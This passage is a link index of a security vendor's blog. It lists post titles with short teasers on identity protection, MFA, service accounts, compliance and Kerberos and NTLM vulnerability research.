](https://www.silverfort.com/blog/mfa-requirements/): Whether you are a bank, healthcare provider, or retail organization, safeguarding sensitive data is paramount. In spite of this, as... - [Top 5 Evaluation Criteria For Choosing The Right ITDR Tool ](https://www.silverfort.com/blog/top-5-evaluation-criteria-for-choosing-the-right-itdr-tool/): Identity is now a top priority for security decision makers. The need to overcome malicious TTPs, such as credential access,... - [Exploring the Top Okta Alternatives: A 2025 Guide to Identity and Access Management Solutions](https://www.silverfort.com/blog/top-okta-alternatives/): Okta has established itself as a leader in Identity and Access Management (IAM), providing powerful user authentication and authorization across... - [Leading Alternatives to CyberArk: Evaluating Advanced Privileged Access Management (PAM) Solutions](https://www.silverfort.com/blog/leading-alternatives-to-cyberark/): Privileged Access Management (PAM) is essential in cybersecurity, especially given that 74% of breaches involve unauthorized access to privileged accounts.... - [Duo Alternatives: Comparing Multi-Factor Authentication (MFA) Solutions for Higher Security](https://www.silverfort.com/blog/duo-alternatives/): Every organization requires a different approach to Multi-Factor Authentication (MFA). Depending on the size, complexity, and sensitivity of an organization’s... - [Top Multi-Factor Authentication (MFA) Solutions for 2025](https://www.silverfort.com/blog/top-multi-factor-authentication-mfa-solutions/): In cybersecurity, the best defense is often layered. As attackers get smarter, so must our defenses, and no security measure... - [The Importance of CJIS Compliance: Meeting the Identity Security Requirements of the CJIS Security Policy](https://www.silverfort.com/blog/how-silverfort-helps-law-enforcement-comply-with-advanced-authentication/): If your organization has access to sensitive data from government agencies, you will most likely have to adhere to the... - [Introducing our Official Global Partner Program and Celebrating Leslie Bois & Amy Kowalchyk, who made CRN’s 2024 Women of the Channel List](https://www.silverfort.com/blog/introducing-our-official-global-partner-program-and-celebrating-leslie-bois-amy-kowalchyk-who-made-crns-2024-women-of-the-channel-list/): We’re so excited to share that CRN®, a brand of The Channel Company, named Silverfort’s Leslie Bois, Vice President of... - [Identity Security in M&A: Gain Visibility into Consolidated Environments with Silverfort ](https://www.silverfort.com/blog/identity-security-in-ma-gain-visibility-with-silverfort/): When a company intends to acquire another organization through a merger or purchase, it is important to know what security... - [Silverfort Announces New Integration with Microsoft Entra ID EAM ](https://www.silverfort.com/blog/silverfort-announces-new-integration-with-microsoft-entra-id-eam/): Silverfort is excited to announce our integration with external authentication methods (EAM) in Microsoft Entra ID, which is now in... - [Using MITM to bypass FIDO2 phishing-resistant protection](https://www.silverfort.com/blog/using-mitm-to-bypass-fido2/): FIDO2 is a modern authentication group term for passwordless authentication. The Fast Identity Online (FIDO) Alliance developed it to replace... - [Silverfort to Unveil Research at RSA 2024: Using MITM to Bypass Modern Authentication Methods to SSO](https://www.silverfort.com/blog/silverfort-to-unveil-research-at-rsa-2024/): Next week is a big week for Silverfort. Many people on our team are heading to California to attend the... - [5 Ways to Step Up Your AD Hygiene with Silverfort  ](https://www.silverfort.com/blog/5-ways-to-step-up-your-ad-hygiene-with-silverfort/): Active Directory (AD) is the backbone of most organizations’ networks, managing access and authentication for users, devices and applications. While... - [The Identity Underground Report: Deep insight into the most critical identity security gaps  ](https://www.silverfort.com/blog/the-identity-underground-report-deep-insight-into-the-most-critical-identity-security-gaps/): We’re proud to unveil the first report based on Silverfort’s proprietary data: The Identity Underground Report. This data, gathered and... - [MFA Protection for Air-Gapped Networks](https://www.silverfort.com/blog/mfa-protection-for-air-gapped-networks/): The recent cyberattacks launched as part the Russia-Ukraine warfare have reawakened concerns about the security of air gapped networks, particularly... - [Mitigating the Identity Risks of Ex-Employees’ Accounts](https://www.silverfort.com/blog/identity-risks-of-stale-user-accounts/): One of the biggest security weaknesses organizations face is their own employees. This isn’t pleasant, but it is a reality... - [Identity Protection Action Items Following Midnight Blizzard Attack](https://www.silverfort.com/blog/identity-protection-action-items-following-midnight-blizzard-attack/): In light of the Midnight Blizzard’s attack, it’s evident that our cybersecurity strategies must evolve to keep pace with the... - [Silverfort Raises $116M to Unify Identity Protection](https://www.silverfort.com/blog/silverfort-raises-116m-to-lead-identity-security-market/): What a year... Despite the economic and geo-political challenges we’ve been experiencing over the last months, Silverfort has grown at... - [Identity Segmentation: A Key Pillar in Bolstering Security Posture](https://www.silverfort.com/blog/identity-segmentation-key-in-bolstering-security-posture/): As cyber threats evolve, organizations must constantly adapt their identity security strategies to stay protected. One of the most significant... - [Healthcare Identity Threats: Why Almost 20% of Breaches Lead to Injury](https://www.silverfort.com/blog/healthcare-identity-threats-why-almost-20-of-breaches-lead-to-injury/): The healthcare industry faces significant threats from data breaches and compromised medical devices, resulting not only in high financial losses... - [The Clock Is Ticking on NY-DFS MFA Requirements](https://www.silverfort.com/blog/the-clock-is-ticking-on-ny-dfs-mfa-requirements/): On March 1, 2017, the Department of Financial Services enacted a regulation establishing cybersecurity requirements for financial services companies, 23... - [Navigating Essential 8 Changes with MFA Protection and Privileged Account Security](https://www.silverfort.com/blog/navigating-essential-8-changes-with-mfa-protection-and-privileged-account-security/): In the ever-evolving landscape of cybersecurity, staying ahead of the game is not just an advantage – it’s a necessity.... - [Finding the Sweet Spot: How Donut Extortion Group Targets Achilles' Heel in Cybersecurity](https://www.silverfort.com/blog/finding-the-sweet-spot-how-donut-extortion-group-targets-achilles-heel-in-cybersecurity/): Every organization faces an ongoing battle against cybersecurity threats. Attackers are constantly looking for vulnerabilities to exploit, seeking out the... - [Understanding MAS Regulations and the Imperative of Service Account Protection](https://www.silverfort.com/blog/understanding-mas-regulations-and-the-imperative-of-service-account-protection/): In the dynamic landscape of financial services, regulatory frameworks play a pivotal role in ensuring stability, security, and fair practices.... - [Service Account Protection Is a Necessity, not a Luxury ](https://www.silverfort.com/blog/service-account-protection-is-a-necessity-not-a-luxury/): The role of service accounts in today’s complex enterprise environment cannot be overstated. These non-human or machine-to-machine (M2M) accounts are... - [Silverfort Secures IMDA Accreditation: Setting New Standards in Identity Protection](https://www.silverfort.com/blog/silverfort-secures-imda-accreditation-setting-new-standards-in-identity-protection/): We are thrilled to announce that Silverfort was accredited by the Infocomm Media Development Authority (IMDA) in Singapore. Silverfort’s accreditation... - [The Identity IR Playbook Against Scattered Spider Attacks  ](https://www.silverfort.com/blog/the-identity-ir-playbook-against-scattered-spider-attacks/): Scattered Spider adversary group has been extremely active in the past month, increasing its outreach to financial and insurance entities.... - [How to Comply with NIS2 Directive MFA Requirements](https://www.silverfort.com/blog/comply-with-nis2-directive-mfa-requirements-with-silverfort/): In article 21, the NIS2 Directive defines the minimum set of security measures regulated entities must implement to comply with... - [How Silverfort Empowers You to Detect and Resolve Identity Risks with Zero Effort](https://www.silverfort.com/blog/how-silverfort-empowers-you-to-detect-and-resolve-identity-risks-with-zero-effort/): When it comes to protecting organizations from compromise, what does visibility mean? It’s a word often used in the security... - [Best IAM Tools for 2024: Secure Identity and Access Management](https://www.silverfort.com/blog/best-iam-tools/): As cyber threats become increasingly sophisticated, identity and access management (IAM) is critical for enterprises to secure their users, systems,... - [Detecting Compromised Credentials: A Comprehensive Guide for Cybersecurity Professionals](https://www.silverfort.com/blog/detecting-compromised-credentials/): A critical and often understated security threat among cybersecurity threats is compromised credentials. With attackers increasingly targeting user login details,... - [Open Sourcing Our Lateral Movement Detection Tool: LATMA](https://www.silverfort.com/blog/open-sourcing-our-lateral-movement-detection-tool-latma/): Collect authentication traffic from Active Directory, create a detailed report (and GIF) that outlines lateral movement patterns Lateral movement detection... - [How Utility Companies Can Take Advantage of FERC Incentives](https://www.silverfort.com/blog/how-silverfort-can-enable-utility-companies-take-advantage-of-ferc-incentives/): The constant evolution of cyber threats has made it much more challenging for organizations to protect their identities and secure... - [Why AI Needs Good Governance](https://www.silverfort.com/blog/why-ai-needs-good-governance/): Throughout my career, I’ve found that one principle remains true: Although technology constantly changes, the patterns that govern it remain... - [MGM Breach Takeaway: On-Prem Has Become Attackers’ Gateway to the Cloud](https://www.silverfort.com/blog/mgm-breach-takeaway-on-prem-has-become-attackers-gateway-to-the-cloud/): Last week, the BlackCat ransomware group (also known as ALPHV) attacked the operations of MGM Resorts and forced them to... - [The Voice of the Identity Practitioners is Clear: Identity Protection is Broken](https://www.silverfort.com/blog/the-voice-of-the-identity-practitioners-is-clear-identity-protection-is-broken/): As an identity security practitioner, it is not news to you that the identity attack surface is exposed. You already... - [Identity Protection Can’t be Taken for Granted Anymore](https://www.silverfort.com/blog/identity-protection-cant-be-taken-for-granted-anymore/): The findings in report challenge the implicit trust that the purchase and deployment of an identity security solution equals protection - [Enterprise MFA Solutions: Securing Access at Scale](https://www.silverfort.com/blog/enterprise-mfa-solutions/): With an increasing number of data breaches and cyber attacks reported daily, multi factor authentication has become essential for any... - [Uncovering Hidden Users: A Guide to Finding Service Accounts on Servers](https://www.silverfort.com/blog/finding-service-accounts-on-servers/): Service accounts are often overlooked users on servers and workstations that can pose serious risks if not properly managed and... - [Top Enterprise IAM Solutions for 2024: Streamlining Identity and Access Management](https://www.silverfort.com/blog/enterprise-iam-solutions/): As cyber threats become increasingly sophisticated, identity and access management (IAM) is critical for enterprises to secure their users, systems,... - [Attention CISOs: Closing Your Identity Protection Gaps is Urgent](https://www.silverfort.com/blog/attention-cisos-closing-your-identity-protection-gaps-is-urgent/): Here’s something that won’t be news to you: The identity-based attack surface is exposed to attacks. But what about your... - [Time to Wake Up: The Defenses of the Identity Attack Surface are Broken](https://www.silverfort.com/blog/the-defenses-of-the-identity-attack-surface-are-broken/): Today we released the world’s first report into the identity attack surface conducted by Osterman research and commissioned by Silverfort... - [Protecting Oil and Gas Companies from Ransomware Threats: Strengthening Air-Gapped OT Networks](https://www.silverfort.com/blog/protecting-oil-and-gas-companies-from-ransomware-threats-strengthening-air-gapped-ot-networks/): In today’s interconnected world, the cybersecurity landscape has grown increasingly complex, especially for critical industries such as oil and gas.... - [Securing Service Accounts with Silverfort](https://www.silverfort.com/blog/securing-service-accounts-with-silverfort/): Managing service accounts can be a daunting task for organizations, as service accounts are scattered across different environments and are... - [Account Census: Creating a Complete Inventory of Service Accounts in Your Domain](https://www.silverfort.com/blog/list-all-service-accounts-in-domain/): Maintaining control and visibility over service accounts is crucial for any organization’s identity security posture management. These privileged accounts are... - [Resolving Shadow Admins: Achieving Maximum Impact with Minimal Effort](https://www.silverfort.com/blog/resolving-shadow-admins-achieving-maximum-impact-with-minimal-effort/): Shadow Admins are non-administrative users that hold sensitive privileges which effectively grant them admin-level rights. Such privileges can include direct... - [Much More Than a Checkbox: Cyber Insurance Can Stop Ransomware Attacks](https://www.silverfort.com/blog/cyber-insurance-can-actually-stop-ransomware-attacks/): Qualifying for a cyber insurance policy is just one more checkbox that security teams are required to tick. We’ve heard... - [Why Ransomware Has Become a Major Identity Threat](https://www.silverfort.com/blog/why-ransomware-has-become-a-major-identity-threat/): Ransomware continues to plague organizations around the world, with more than 493. 3 million attacks detected in 2022. Despite a... - [Resolving the Identity Protection Gaps in APRA’s Resilience Assessment’s Findings ](https://www.silverfort.com/blog/resolving-the-identity-protection-gaps-in-apra-resilience-assessments-findings/): The Australian Prudential Regulation Authority (APRA) recently published findings from a study examining the level of cybersecurity resilience of its... - [How Healthcare Providers Can Gain Visibility into Their Consolidated Environments](https://www.silverfort.com/blog/how-silverfort-helps-healthcare-providers-gain-visibility-into-their-consolidated-environments/): In recent years, the healthcare industry has witnessed a notable surge in consolidation, with numerous hospitals, clinics, and healthcare providers... - [Solving the Toughest Challenges of Privileged Access Management](https://www.silverfort.com/blog/how-silverfort-solves-the-toughest-challenges-of-privileged-access-management-pam/): The standard way of addressing security issues that stem from an organization’s privileged user accounts is with a privileged access... - [Building an Alert System Using Snowflake](https://www.silverfort.com/blog/building-an-alert-system-using-snowflake/): During my time here at Silverfort, I was tasked with building an alert system to send messages from our Snowflake... - [Mind the Gap! Who’s Accountable for Protecting Against Identity Threats in Your Organization?](https://www.silverfort.com/blog/mind-the-gap-whos-accountable-to-protect-against-identity-threats-in-your-organization/): Identity threats (i. e. , the use of compromised credentials for malicious access to targeted resources) have become the dominant... - [Uncovering the Trails: A Step-by-Step Guide to Tracking Service Account Usage](https://www.silverfort.com/blog/guide-to-tracking-service-account-usage/): Service accounts are powerful tools that perform important automated functions within IT systems, but they can also pose significant risks... - [Introducing the LATMA Algorithm for Better Lateral Movement Detection](https://www.silverfort.com/blog/introducing-the-latma-algorithm-for-better-lateral-movement-detection/): Lateral movement detection is a challenge every cybersecurity researcher is likely familiar with. My team and I faced this challenge... - [Uncovering the Hidden Risks of Mobile Device Security](https://www.silverfort.com/blog/uncovering-the-hidden-risks-of-mobile-device-security/): Organizations often encounter issues when trying to implement best practices in mobile device security while also ensuring a seamless user... - [Protecting Against the Risk of Shadow Admins](https://www.silverfort.com/blog/how-silverfort-protects-against-the-risk-from-shadow-admins/): Shadow admins are one of the key attack surfaces that adversaries regularly take advantage of. The pattern of discovering a... - [Applying Service Accounts Security Best Practices with Silverfort](https://www.silverfort.com/blog/applying-service-accounts-security-best-practices-with-silverfort/): Managing service accounts can be a daunting task for organizations, as service accounts are scattered across different environments and are... - [Three Cyberattacks Where Compromised Service Accounts Played a Key Role](https://www.silverfort.com/blog/3-cyberattacks-in-which-compromised-service-accounts-played-a-key-role/): Securing service accounts is a notoriously difficult task. One of the main reasons for this difficulty is that service accounts... - [How to Find Service Accounts in Active Directory: A Comprehensive Guide](https://www.silverfort.com/blog/how-to-find-service-accounts-in-active-directory/): Service accounts are a critical component of any enterprise environment, used to perform a variety of automated processes. However, these... - [The Security Risks of Service Accounts: You Can't Protect What You Can’t See](https://www.silverfort.com/blog/the-security-risks-of-service-accounts-you-cant-protect-what-you-cant-see/): Service accounts play an important role in today’s enterprise environment. These non-human or machine-to-machine (M2M) accounts are used by applications,... - [Applying Service Accounts Security Best Practices](https://www.silverfort.com/blog/service-accounts-security-best-practices/): Managing service accounts can be a daunting task for organizations, as service accounts are scattered across different environments and are... - [Five Reasons Why Silverfort is the Perfect First Step on Your Zero Trust Journey](https://www.silverfort.com/blog/five-reasons-why-silverfort-is-the-ultimate-first-step-on-your-zero-trust-journey/): Zero Trust has traditionally been thought of in the context of a network, with implementation considered a project primarily focused... - [Password Permutations: The Importance of Rotating Service Account Passwords](https://www.silverfort.com/blog/rotating-service-account-passwords/): Regularly rotating service account passwords is a critical cyber security best practice, yet it remains an often overlooked process in... - [Silverfort Protection Against CVE-2023-23397 Outlook Zero Day](https://www.silverfort.com/blog/silverfort-protection-against-cve-2023-23397-outlook-zero-day/): In the latest Patch Tuesday, Microsoft released a patch for CVE-2023-23397 Zero Day in Outlook, which was reported to be... - [Use Caution: Security Risks and Mitigation Practices Following the Collapse of SVB](https://www.silverfort.com/blog/take-caution-top-3-security-risks-and-mitigation-practices-following-svb-collapse/): The collapse of Silicon Valley Bank bears direct implications on adversaries’ activity. As always, uncertainty and panic are threat actors’... - [MFA and Administrative Access Protection Are the Means. But to What End?](https://www.silverfort.com/blog/mfa-and-administrative-access-protection-are-the-means-but-to-what-end/): Every so often in cybersecurity it’s useful to reflect on things taken for granted and choices made — specifically why... - [Passwords End with Passkeys ](https://www.silverfort.com/blog/passwords-end-with-passkeys/): The death of passwords has been declared continuously by the security community but now it might stick with the introduction... - [Complying with CCOP Identity Protection Requirements](https://www.silverfort.com/blog/compliance-with-ccop-identity-protection-requirements-made-easy-with-silverfort/): The Cybersecurity Code of Practice for Critical Information Infrastructure 2. 0 is an enhancement of the first version that was... - [Need an Insurance Policy Against Ransomware Attacks? Get Silverfort’s Free Identity Security Assessment](https://www.silverfort.com/blog/need-an-insurance-policy-against-ransomware-attacks-get-silverforts-free-identity-security-assessment/): Many organizations are struggling today with aligning their security controls with what underwriters now require in order to get cyber... - [Bounce the Ticket and Silver Iodide Attacks on Azure AD Kerberos ](https://www.silverfort.com/blog/bounce-the-ticket-and-silver-iodide-attacks-on-azure-ad-kerberos/): Silverfort research finds threat actors could attack new Microsoft cloud authentication protocol to steal or forge cloud tickets and carry... - [What’s New with Silverfort’s Service Accounts Protection Capabilities](https://www.silverfort.com/blog/whats-new-with-silverforts-service-accounts-protection-capabilities/): The new year has only just begun, and thanks to the ongoing work of the Silverfort team with the help... - [Top 5 Identity Protection Challenges for Manufacturing Companies](https://www.silverfort.com/blog/top-5-identity-protection-challenges-for-manufacturing-companies/): It is common knowledge that manufacturing is one of the most targeted verticals and that threat actors launch data theft... - [Think You've Implemented Zero Trust? You Might Need To Think Again.](https://www.silverfort.com/blog/rethinking-your-zero-trust-implementation/): Despite becoming a bit over-marketed, zero trust is still one of the most important cybersecurity approaches for protecting your organization’s... - [Okta’s GitHub Breach: Insights and Recommendations](https://www.silverfort.com/blog/oktas-github-breach-insights-and-recommendations/): As recently reported, Okta recently experienced a security breach where the source code for its workforce identity cloud was stolen.... - [Revolutionizing Work at Silverfort with ChatGPT ](https://www.silverfort.com/blog/revolutionizing-work-at-silverfort-with-chatgpt/): At Silverfort, we’re always looking for ways to improve our work and make it more efficient. Recently, we started using... - [How to Accelerate the Privileged Access Management Journey](https://www.silverfort.com/blog/how-to-accelerate-the-privileged-access-management-journey/): A robust PAM solution in place deprives threat actors of the ability to utilize compromised admin credentials for malicious access... - [The Security Risks of Service Accounts: Why Cyber Insurance Underwriters Are Tightening Requirements](https://www.silverfort.com/blog/the-security-risks-of-service-accounts-why-cyber-insurance-underwriters-are-tightening-requirements/): As ransomware attacks continue to skyrocket, both in frequency and intensity, underwriters of cyber insurance policies have been dramatically tightening... - [Cyber Insurance & MFA: 5 Things Every Broker Should Know](https://www.silverfort.com/blog/cyber-insurance-mfa-5-things-every-broker-should-know/): The surge in ransomware attacks has led leading underwriters to raise the bar for renewal or purchase of cyber insurance... - [Silverfort: Your One-Stop MFA Solution for Cyber Insurance Compliance](https://www.silverfort.com/blog/silverfort-your-one-stop-mfa-solution-for-cyber-insurance-compliance/): The past couple years have brought major changes to cyber insurance policies. Notably, almost all brokers are now requiring multi-factor... - [The MFA Blind Spot of Legacy Applications](https://www.silverfort.com/blog/the-mfa-blind-spot-of-legacy-applications/): Despite the surge over the past few years to move all resources to the cloud, the use of legacy, on-prem... - [Technical Analysis of CVE-2022-33679 and CVE-2022-33647 Kerberos Vulnerabilities](https://www.silverfort.com/blog/technical-analysis-of-cve-2022-33679-and-cve-2022-33647-kerberos-vulnerabilities/): Written by Yoav Iellin and Dor Segal, Researchers at Silverfort Microsoft’s September 2022 Patch Tuesday included two high-risk elevation of... - [How High Touch Technologies Renewed Their Cyber Insurance Policy](https://www.silverfort.com/blog/how-high-touch-renewed-cyber-insurance-policy/): The massive spike in ransomware attacks in 2021 – up 105% worldwide, according to SonicWall – left cyber insurance companies... - [Customer Case Study: Preventing NTLM-Based Lateral Movement with Silverfort ](https://www.silverfort.com/blog/customer-case-study-preventing-ntlm-based-lateral-movement-with-silverfort/): Since its inception, NTLM authentication protocol has been infamous for its low resiliency against attackers that seek to compromise it... - [Uber Breach Key Takeaways: Why MFA, Service Account Protection & PAM Must Work Together to Protect Against Compromised Credentials](https://www.silverfort.com/blog/uber-breach-key-takeaways-why-mfa-service-account-protection-pam-must-work-together-to-protect-against-compromised-credentials/): The recent Uber breach should be a wake-up call in rethinking about how identity protection is implemented and practiced in... - [Identity’s Role as a Strategic Risk Mitigation Tool](https://www.silverfort.com/blog/identitys-role-as-a-strategic-risk-mitigation-tool/): For large organizations operating in an uncertain world, a big picture view of risk is crucial. Understanding and addressing the... - [Privilege Escalation in Entra ID (formerly Azure AD)](https://www.silverfort.com/blog/privilege-escalation-in-azure-ad/): Privilege escalation attacks are one of the most pressing issues for security teams worldwide and are commonly used as a... - [Cisco Breach: A Painful Reminder of the Lateral Movement Blind Spot](https://www.silverfort.com/blog/cisco-breach-a-painful-reminder-of-the-lateral-movement-blind-spot/): No one is immune to breaches, as demonstrated last week when the networking giant Cisco reported a breach of its... - [Deadline Looms for Compliance with FTC’s Revamped Data Protection Rule](https://www.silverfort.com/blog/deadline-looms-for-compliance-with-ftcs-revamped-data-protection-rule/): On December 9 of last year, while the world braced for another wave of COVID infections, something even more serious... - [Cyber Insurance Win-Win: How Brokers Can Help Clients Comply](https://www.silverfort.com/blog/cyber-insurance-win-win-brokers-clients/): As cyberattacks continue to escalate in frequency and intensity, so do the stakes for both cyber insurance providers and their... - [Enabling Organizations to Resolve the Risks of NTLMv1](https://www.silverfort.com/blog/resolving-the-risks-of-ntlmv1/): Although a key part of cyber resilience is adapting to changes in technology, addressing attack surfaces that have remained constant... - [Silverfort Proactively Detects & Protects Against Certifried Attacks](https://www.silverfort.com/blog/silverfort-proactively-detects-protects-against-certifried-attacks/): In early May 2022, the Certifried (CVE-2022-26923) vulnerability was published. This vulnerability abuses Kerberos certificate extension and its Active Directory... - [Silverfort Raises $65M in Series C Funding](https://www.silverfort.com/blog/silverfort-raises-65m-in-series-c-funding/): We’re very excited to announce that we’ve raised $65M in Series C funding! A few words about what this milestone... - [The Okta Breach – Lessons Only the Attackers Can Teach](https://www.silverfort.com/blog/the-okta-breach-lessons-only-the-attackers-can-teach/): “There is no teacher but the enemy. No one but the enemy will tell you what the enemy is going... - [Protecting Against Healthcare Ransomware Attacks with MFA](https://www.silverfort.com/blog/protecting-against-healthcare-ransomware-attacks-with-mfa/): Security and data breaches are a major concern for every organization, and even more so for healthcare providers. The sensitivity... - [What Makes Lateral Movement Attacks a Blind Spot?](https://www.silverfort.com/blog/lateral-movement-attacks-blind-spot/): Lateral movement attacks are effectively a blind spot in today’s security stack, which cannot detect and prevent them in real-time.... - [Are you Ready for Stage 2 of the Log4Shell Attacks?](https://www.silverfort.com/blog/are-you-ready-for-stage-2-of-the-log4shell-attacks/): The tidal waves from the newly discovered Log4Shell zero-day attack are yet to be determined. Many organizations have hurried to... - [Monitoring for Log4j2 Exploits with Silverfort](https://www.silverfort.com/blog/monitoring-for-log4j2-exploits-with-silverfort/): Apache Log4j is an open-source, Java-based logging utility widely used by enterprise applications. The security community recently discovered a new... - [Bring Order to your Identities while Transitioning to the Cloud](https://www.silverfort.com/blog/bring-order-to-identities-while-transitioning-to-cloud/): Your enterprise is transitioning to a hybrid network. Maybe it already has. This is great news, but it also presents... - [Solving Active Directory Protection Gap with MFA for RDP, PsExec and PowerShell](https://www.silverfort.com/blog/solving-active-directory-protection-gap-with-mfa-for-rdp-psexec-and-powershell/): While transition to the cloud and digital transformation are continuously reshaping IT, Active Directory (AD) is a still a key... - [Ping Identity and Silverfort Unite to Deliver Identity-Centric Zero Trust](https://www.silverfort.com/blog/ping-identity-silverfort-identity-centric-zero-trust/): Ping Identity and Silverfort have joined forces to introduce a new approach of Identity-centric Zero Trust security that enables Zero... - [Rethinking Ransomware Protection](https://www.silverfort.com/blog/rethinking-ransomware-protection/): Ransomware has gradually evolved since it was first introduced in 2005. In 2013, ransomware attacks began to target the enterprise... - [Silverfort Security Advisory: NTLM Relay to AD CS – PetitPotam and Printer Bug](https://www.silverfort.com/blog/silverfort-security-advisory-petitpotam-and-printer-bug/): The PetitPotam attack, published on GitHub, causes a remote server to authenticate to a target server with NTLM, using an MS-EFSRPC... - [Silverfort Proactively Prevents Exploitation of PrintNightmare Vulnerability](https://www.silverfort.com/blog/silverfort-proactively-prevents-exploitation-of-printnightmare-vulnerability/): A vulnerability in Windows Print Spooler could allow for remote code execution as “System” by authenticated domain users on Windows... - [Prevent Automated Propagation of Ransomware Attacks](https://www.silverfort.com/blog/prevent-automated-propagation-of-ransomware-attacks/): Ransomware attacks rank high among enterprises’ cybersecurity concerns. The common practice today is to protect against the delivery and execution... - [Three Reasons the Private Sector Should Take Notice of the Cybersecurity Executive Order](https://www.silverfort.com/blog/three-reasons-private-sector-should-notice-cybersecurity-eo/): The recent Executive Order, signed by President Biden in May 2021, is a response to a series of high-profile cyberattacks... - [Silverfort Researchers Discover KDC Spoofing Vulnerability in F5 Big-IP [CVE-2021-23008]](https://www.silverfort.com/blog/silverfort-researchers-discover-kdc-spoofing-vulnerability-in-f5-big-ip-cve-2021-23008/): Last year we reported three Key Distribution Center (KDC) spoofing vulnerabilities in Cisco ASA, Palo Alto Networks PAN-OS and IBM... - [What is Multi Factor Authentication (MFA)?](https://www.silverfort.com/blog/what-is-multi-factor-authentication-mfa/): Multi Factor Authentication (MFA) is a security technology that is used to validate that users who authenticate with credentials are... - [Why Ending WFH Might Make Security Worse](https://www.silverfort.com/blog/why-ending-wfh-might-make-security-worse/): As COVID-19 vaccine rollouts pick up steam, it’s time to start thinking about the day after, and how a possible... - [Hafnium Microsoft Exchange Zero Days Expose Admin Access as a Critical Attack Surface](https://www.silverfort.com/blog/hafnium-microsoft-exchange-zero-days-admin-access-critical-attack-surface/): Microsoft has recently disclosed that four zero-day vulnerabilities in Microsoft Exchange Server are actively being exploited in the wild by... - [Consolidating Your Hybrid IAM on Microsoft Entra ID (formerly Azure AD)](https://www.silverfort.com/blog/consolidating-your-hybrid-iam-on-microsoft-azure-ad/): Modern enterprise IT environments are highly diverse and include many different assets, from legacy IT infrastructure to modern cloud workloads.... - [It's Time for Unified Identity Protection](https://www.silverfort.com/blog/its-time-for-unified-identity-protection/): *****By Hed Kovetz, CEO and Co-Founder, Silverfort***** Identity-based attacks, which use compromised credentials to access enterprise resources, continue to grow... - [Service Accounts Likely Played a Key Role in the SunBurst Attack](https://www.silverfort.com/blog/service-accounts-key-role-in-sunburst-attack/): ***** By Gal Sadeh, Lead Data Scientist, Silverfort ***** Research we have conducted at Silverfort Labs indicates that service accounts... - [The Pay2Key APT Campaign – Why Identity Protection is Needed more than Ever](https://www.silverfort.com/blog/why-identity-protection-is-needed-more-than-ever/): The Pay2Key attacks have targeted leading enterprises in the past couple of months with various ransomware, extortion and data theft... - [Silverfort Revolutionizes Protection Against Lateral Movement with MFA – Reflections on the SolarWinds Attack](https://www.silverfort.com/blog/silverfort-revolutionizes-protection-against-lateral-movement-with-mfa/): *****By https://www. silverfort. com/wp-content/uploads/2022/06/Thumbnails-for-Resources-and-blog-green_0001s_0001_Generic1-Archive-card-842x626px-24. png Keshet, Director of Product Marketing, Silverfort ***** MFA prevents 99. 9% of account compromise. However,... - [Silverfort Protection Against the Bronze Bit CVE-2020-17049 Exploit – Update](https://www.silverfort.com/blog/silverfort-bronze-bit-cve-2020-17049/): On December 8, the new Bronze Bit exploit of CVE-2020-17049 Kerberos vulnerability was made public, adding another cutting-edge weapon to... - [Delegation Threats: Deep Dive into Microsoft Patch of CVE-2020-17049 KCD Vulnerability](https://www.silverfort.com/blog/delegation-treats-cve-2020-17049/): *****By Dor Segal, Security Researcher at Silverfort***** On November 11, 2020 Microsoft disclosed CVE-2020-17049, a new Kerberos Security Feature Bypass... - [FunnyDream APT Campaign – Zoom in on Silverfort Protection Against Lateral Movement](https://www.silverfort.com/blog/funnydream-apt-campaign-lateral-movement/): *****By https://www. silverfort. com/wp-content/uploads/2022/06/Thumbnails-for-Resources-and-blog-green_0001s_0001_Generic1-Archive-card-842x626px-24. png Keshet, Director of Product Marketing, Silverfort***** A new APT campaign, dubbed ‘FunnyDream’, has been discovered... - [Third KDC Spoofing Vulnerability Identified by Silverfort Researchers – This Time In IBM QRadar [CVE-2019-4545]](https://www.silverfort.com/blog/third-kdc-spoofing-ibm-qradar-cve-2019-4545/): *****By Yoav Iellin, Yaron Kassner, Dor Segal & Rotem Zach, Silverfort***** KDC spoofing never gets old. We’ve disclosed KDC spoofing... - [ZeroLogon – Patching is Not Enough](https://www.silverfort.com/blog/zerologon-patching-is-not-enough/): Guidelines and Tools for Protecting Your Environment from CVE-2020-1472 By Yaron Kassner, CTO and Co Founder, Silverfort Secura recently published... - [ZeroLogon – Patching is Not Enough](https://www.silverfort.com/blog/zerologon-patching-is-not-enough-2/): Guidelines and Tools for Protecting Your Environment from CVE-2020-1472 By Yaron Kassner, CTO and Co Founder, Silverfort Secura recently published... - [Silverfort Researchers Discover an Authentication Bypass Vulnerability in Palo Alto Networks PAN-OS [CVE-2020-2002]](https://www.silverfort.com/blog/silverfort-researchers-panw-pan-os-cve-2020-2002/): Palo Alto Networks published an advisory about a KDC-spoofing vulnerability in PAN-OS that was discovered and responsibly disclosed to Palo... - [Silverfort Researchers: Kerberos Exploit Can Bypass Authentication to Cisco ASA [CVE-2020-3125]](https://www.silverfort.com/blog/cisco-vulnerability-cve-2020-3125-2/): Security researchers at Silverfort, provider of agentless authentication platform, identified a severe vulnerability that can enable hackers to gain control... - [Silverfort Researchers Discover an Authentication Bypass Vulnerability in Palo Alto Networks PAN-OS [CVE-2020-2002]](https://www.silverfort.com/blog/silverfort-researchers-panw-pan-os-cve-2020-2002-2/): Palo Alto Networks published an advisory about a KDC-spoofing vulnerability in PAN-OS that was discovered and responsibly disclosed to Palo... - [Silverfort Researchers: Kerberos Exploit Can Bypass Authentication to Cisco ASA [CVE-2020-3125]](https://www.silverfort.com/blog/cisco-vulnerability-cve-2020-3125/): Security researchers at Silverfort, provider of agentless authentication platform, identified a severe vulnerability that can enable hackers to gain control... - [The State of the Identity Attack Surface: Insights into Critical Protection Gaps](https://www.silverfort.com/blog/post-test/): Executive Summary This survey discloses a critical gap in organizations’ ability to protect themselves against identity threats—with 83% already having... - [The Hidden Dangers of Shadow Admins](https://www.silverfort.com/blog/the-hidden-dangers-of-shadow-admins/): Shadow Admin accounts are user accounts that have sensitive privileges – not because they are members of a privileged admin... - [The Hidden Dangers of Shadow Admins](https://www.silverfort.com/blog/the-hidden-dangers-of-shadow-admins-2/): Shadow Admin accounts are user accounts that have sensitive privileges – not because they are members of a privileged admin... - [Silverfort Named Winner of the PCI 2020 Awards for Excellence](https://www.silverfort.com/blog/silverfort-named-winner-of-the-pci-2020-awards-for-excellence/): Silverfort has been named a winner of the PCI 2020 Awards for Excellence at this year’s prestigious PCI London event.... - [Silverfort Named Winner of the PCI 2020 Awards for Excellence](https://www.silverfort.com/blog/silverfort-named-winner-of-the-pci-2020-awards-for-excellence-2/): Silverfort 